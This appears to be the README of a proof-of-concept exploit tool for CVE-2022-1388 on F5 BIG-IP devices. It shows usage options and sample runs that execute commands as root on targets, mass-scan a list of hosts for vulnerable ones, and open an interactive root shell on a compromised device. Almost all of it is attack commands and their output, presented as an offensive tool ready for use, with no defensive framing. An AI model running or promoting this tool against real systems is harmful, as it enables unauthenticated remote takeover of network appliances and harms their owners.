PoC for exploiting CVE-2022-1388 on BigIP F5
python3 refresh.py -h
usage: refresh.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL target url
-f F, --file F url file
-c CMD, --command CMD
command
-s SH, --shell SH url to connect
$ python3 refresh.py -u IP -c id
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
$ python3 refresh.py -f list.txt -c id
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) context=system_u:system_r:init_t
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
--------------------------
Vulnerable targets scanned:
[+] xxx.xxx.xxx.xxx
$ python3 refresh.py -s xxx.xxx.xxx.xxx
::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: ::: :::
:+: :+::+: :+: :+: :+::+: :+: :+::+: :+:
+:+ +:++:+ +:+ +:+ +:++:+ +:+ +:+ +:+
+#++:++#: +#++:++# :#::+::# +#++:++#: +#++:++# +#++:++#+++#++:++#++
+#+ +#++#+ +#+ +#+ +#++#+ +#++#+ +#+
#+# #+##+# #+# #+# #+##+# #+# #+##+# #+#
### ################ ### ##################### ### ###
</coded by Luchoane>
Welcome to the interactive shell for: xxx.xxx.xxx.xxx
User: root
> ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.027/0.027/0.027/0.000 ms
>